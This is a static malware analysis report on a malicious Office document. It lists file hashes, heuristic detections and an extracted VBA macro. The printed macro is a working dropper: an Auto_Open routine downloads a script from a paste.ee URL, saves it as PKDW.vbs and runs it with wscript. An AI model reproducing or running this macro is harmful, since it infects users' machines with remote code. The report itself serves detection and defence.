Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 20eaa4f75016efc1…

MALICIOUS

Office (OOXML)

17.5 KB First seen: 2021-04-10
MD5: 135f04622f26c7124dfad0552f3fd29f SHA-1: 3655dba741573860ff052cc2e0e5d585a2de89fe SHA-256: 20eaa4f75016efc160ae2f9b73beb5cde8e57856c7d2bc83606a2a9dd670374b
190 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell ("wscript PKDW.vbs")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
     .write JjBl.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set JjBl = CreateObject("Microsoft.XMLHTTP")
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Public Sub Auto_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://paste.ee/d/OxThF/0 Referenced by macro
    • https://paste.ee/d/OxThF/0�Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1061 bytes
SHA-256: 88974c3139f69c3dc1a4504e8b4b3d822b677b5f4888dbd6130c3ac16f3f2f98
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Public Sub Auto_Open()
 
 Set JjBl = CreateObject("Microsoft.XMLHTTP")
 Set YoLW = CreateObject("Adodb.Stream")
  
With JjBl
 .Open "GET", "https://paste.ee/d/OxThF/0", False
 .send
End With
 
With YoLW
 .Type = 1
 .Open
 .write JjBl.responseBody
 .savetofile "PKDW.vbs", 2
End With
 
Shell ("wscript PKDW.vbs")
 
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D0A1A585-CDA5-4A8A-B275-FCE26607F9CC}{B6D80F10-933B-4A57-8E4E-567EBDC053C2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{EF85728B-2834-4A6C-B0E9-D369092343D3}{045A2107-5B4D-4169-B9E2-F5B768339FFF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 108032 bytes
SHA-256: 54dfa6ebe141dc3c25230626165f804bc81aeff23ef51e1393acd1683c751aa5

Open this report in the interactive analyzer, or submit your own file for analysis.